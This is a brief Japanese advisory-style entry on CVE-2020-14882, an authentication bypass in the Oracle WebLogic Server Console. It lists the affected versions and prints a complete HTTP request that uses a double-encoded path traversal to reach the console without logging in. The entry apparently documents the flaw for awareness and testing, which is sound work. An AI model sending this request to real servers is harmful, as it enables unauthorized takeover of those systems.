
[CVE-2020-14882] Oracle WebLogic Server 認証バイパス
[CVE-2020-14882] Oracle WebLogic Server の認証バイパス
Oracle Fusion Middleware の Oracle WebLogic Server 製品 (コンポーネント: Console) における脆弱性です。影響を受けるサポート対象バージョンは、10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0および 14.1.1.0.0. です。悪用が容易なこの脆弱性により、HTTP を介してネットワークアクセスを持つ未認証の攻撃者が Oracle WebLogic Server を侵害する可能性があります。この脆弱性の攻撃が成功すると、Oracle WebLogic Server の乗っ取りにつながる可能性があります。
GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,zh;q=0.9
Connection: close
